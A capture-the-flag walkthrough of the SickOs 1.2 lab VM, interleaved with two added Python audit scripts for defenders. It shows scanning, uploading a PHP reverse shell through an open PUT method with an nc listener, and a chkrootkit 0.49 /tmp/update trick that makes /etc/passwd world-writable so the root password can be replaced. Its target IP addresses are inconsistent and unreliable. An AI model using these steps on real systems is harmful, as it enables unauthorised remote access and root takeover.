SICKOS: 1.2 walkthrough
First download the vulnerable box using this link. After downloading the VM, configure it in VirtualBox.
Enumeration start
First we scan the network to find the vulnerable box's IP address, so we use the netdiscover command to scan the network.
$ sudo netdiscover
Now we scan the vulnerable box's IP address with nmap.
$ nmap -v -p- 192.168.1.238
We have two ports to enumerate. Now let's scan them with nmap's default scripts and OS detection.
$ sudo nmap -sC -sV -sT -sU -A -p 22,80 192.168.1.238
Let's enumerate port 80 and see what is running there: open the IP address in a browser.
We see a simple image on port 80. Now brute-force directories on port 80 using dirsearch; maybe we will find some interesting content.
$ dirsearch -u http://192.168.1.238/
After the dirsearch scan we have a test directory. Now we check the test directory.
After enumerating the test directory we find no files in it, so let's try some more tricks.
We can use the curl command to check which HTTP methods are allowed on the target host. Now we use curl to check the methods.
$ curl -v -X OPTIONS http://192.168.1.238/test
The PUT method is allowed, so now let's try to upload a file to this box. First we upload a phpinfo file to make sure PHP is available on this server.
Now I am connected to a different network, so don't worry about the IP address: my machine's IP address is now 192.168.43.156. Note: please don't change your network; the network change is my own issue. Let's PUT the phpinfo file on the server.
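The OPTIONS check above is exactly what an administrator should run against their own server, because a directory that advertises PUT (or DELETE, MOVE, and other write methods) without authentication is what makes the upload in this walkthrough possible. The following audit script is an added example for this post, not part of the original walkthrough: it parses an Allow header and flags write-capable methods, and it can probe a server you administer with an OPTIONS request. The sample Allow header and the host name are constructed for illustration.

```python
"""Audit the HTTP methods a web server advertises and flag the ones that let
an unauthenticated client modify content.

Added defender-side example; not part of the original walkthrough.
The sample header and host below are constructed for illustration.
"""
from http.client import HTTPConnection
from typing import List, Optional

# Methods that write to the server. None of them should be advertised on a
# directory that is reachable without authentication.
WRITE_METHODS = {"PUT", "DELETE", "PATCH", "MOVE", "COPY", "MKCOL", "PROPPATCH"}


def parse_allow_header(allow: str) -> List[str]:
    """Split an Allow header value such as 'GET,HEAD,POST,OPTIONS,PUT'."""
    return [m.strip().upper() for m in allow.split(",") if m.strip()]


def risky_methods(allow: str) -> List[str]:
    """Return the write-capable methods advertised in an Allow header, sorted."""
    return sorted(m for m in parse_allow_header(allow) if m in WRITE_METHODS)


def probe_options(host: str, path: str = "/", port: int = 80,
                  timeout: float = 5.0) -> Optional[str]:
    """Send one OPTIONS request to a server you administer and return its
    Allow header (None if the server does not send one)."""
    conn = HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("OPTIONS", path)
        resp = conn.getresponse()
        return resp.getheader("Allow")
    finally:
        conn.close()


if __name__ == "__main__":
    # Constructed example of what a permissive directory returns.
    sample = "GET,HEAD,POST,OPTIONS,PUT"
    print("risky methods advertised:", risky_methods(sample))  # -> ['PUT']
```

Run probe_options("webserver.example", "/test/") (a placeholder host) after a configuration change to confirm the Allow header no longer lists PUT. On Apache the usual fix is to wrap the directory in a LimitExcept block that denies every method except GET, HEAD and POST (or to disable the DAV module if it is not needed), and to alert on any 2xx response to a PUT request in the access log.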
$ curl -v -X PUT -d "<?php phpinfo(); ?>" http://192.168.43.156/test/phpinfo.php
The phpinfo file executes on the server, so now we are sure PHP is installed on this box.
Let's upload a reverse shell and make a terminal connection with this box.
We will use the curl command to upload the file to the server.
$ cp /usr/share/webshells/php/php-reverse-shell.php .
After copying the reverse shell we update our IP address and port in the php-reverse-shell.php file.
$ vim php-reverse-shell.php
After updating the IP address in php-reverse-shell.php, upload the file to the server using curl.
$ curl -T php-reverse-shell.php --url http://192.168.1.249/test/php-reverse-shell.php -0
Let's check the reverse shell and execute it.
Now start a listener with nc, and once it is listening, execute php-reverse-shell.php.
$ sudo nc -nlvp 443
Now convert the plain shell to a fully interactive shell using this link and enumerate the box.
After enumerating the box we see a chkrootkit entry in the crontab.
Now check the version of chkrootkit.
$ chkrootkit -V
chkrootkit version 0.49 is vulnerable to local privilege escalation; an exploit for this version is available on Exploit-DB. Click this link to see the exploit.
Now, following the exploit, create a file in the tmp directory to escalate privileges.
$ ls -lah /etc/passwd
Now you can see the /etc/passwd file permissions. We escalate privileges using the vulnerable chkrootkit version.
Now go to the /tmp directory and create a file there.
$ cd /tmp
$ ls
$ nano update
Put some content in the update file:
#!/bin/bash
chmod 777 /etc/passwd
Now give execute permission to this file.
After creating the update file, wait until the cron job runs; then you get 777 permissions on the passwd file.
Now update the root password in the passwd file.
First generate a Linux password hash using the openssl command.
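The root cause of this escalation is a cron job running an old chkrootkit that executes an attacker-controlled /tmp/update as root; the symptom is a world-writable /etc/passwd. The audit below is an added example for this post (not from the original walkthrough and not from the chkrootkit project) that a defender can run as an unprivileged user to catch all three conditions: a chkrootkit older than 0.50 (the first release that stopped executing /tmp/update), an unexpected /tmp/update file, and a world-writable passwd file. The demo_findings() helper builds a constructed scenario in a temporary directory so the script can be run offline; the real fix is to upgrade chkrootkit and restore /etc/passwd to mode 644.

```python
"""Audit a host for the chkrootkit 0.49 cron escalation conditions.

Added defender-side example; not part of the original walkthrough.
demo_findings() uses a constructed temporary directory instead of the
real /tmp and /etc/passwd.
"""
import stat
import tempfile
from pathlib import Path
from typing import List, Tuple


def parse_version(text: str) -> Tuple[int, ...]:
    """Extract the numeric version from 'chkrootkit -V' output, e.g.
    'chkrootkit version 0.49' -> (0, 49)."""
    for token in text.split():
        parts = token.split(".")
        if len(parts) >= 2 and all(p.isdigit() for p in parts):
            return tuple(int(p) for p in parts)
    raise ValueError(f"no version number found in {text!r}")


def vulnerable_version(text: str) -> bool:
    """Releases before 0.50 execute /tmp/update as root from the cron run."""
    return parse_version(text) < (0, 50)


def audit(version_output: str, tmp_dir: str = "/tmp",
          passwd_path: str = "/etc/passwd") -> List[str]:
    """Return a list of findings; an empty list means nothing suspicious."""
    findings: List[str] = []
    if vulnerable_version(version_output):
        findings.append("chkrootkit older than 0.50: the cron job will "
                        "execute /tmp/update as root; upgrade it")
    update = Path(tmp_dir) / "update"
    if update.exists():
        mode = update.stat().st_mode
        executable = bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
        findings.append(f"unexpected file {update} present "
                        f"(executable={executable}); inspect and remove it")
    passwd = Path(passwd_path)
    if passwd.exists() and passwd.stat().st_mode & stat.S_IWOTH:
        findings.append(f"{passwd_path} is world-writable; "
                        f"restore mode 644 and check for added accounts")
    return findings


def demo_findings() -> List[str]:
    """Constructed scenario: vulnerable version, a stray update file and a
    world-writable passwd copy, all inside a temporary directory."""
    with tempfile.TemporaryDirectory() as d:
        update = Path(d) / "update"
        update.write_text("placeholder\n")
        update.chmod(0o755)
        passwd = Path(d) / "passwd"
        passwd.write_text("root:x:0:0:root:/root:/bin/bash\n")
        passwd.chmod(0o777)
        return audit("chkrootkit version 0.49",
                     tmp_dir=d, passwd_path=str(passwd))


if __name__ == "__main__":
    for line in demo_findings():
        print("FINDING:", line)
    # On a real host: audit(subprocess.check_output(["chkrootkit", "-V"]).decode())
```

A clean host returns an empty list from audit(); scheduling the script alongside the cron job turns the /tmp/update trick into an alert instead of a silent root shell.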
$ openssl passwd 1234
Now put this password hash into the /etc/passwd file using the nano text editor.
Now switch to the root user using the password 1234.
$ su root
Password:1234
We have now successfully rooted this box, and we enjoyed the PUT method and the chkrootkit 0.49 vulnerability along the way.
happy hacking :)
mr. hide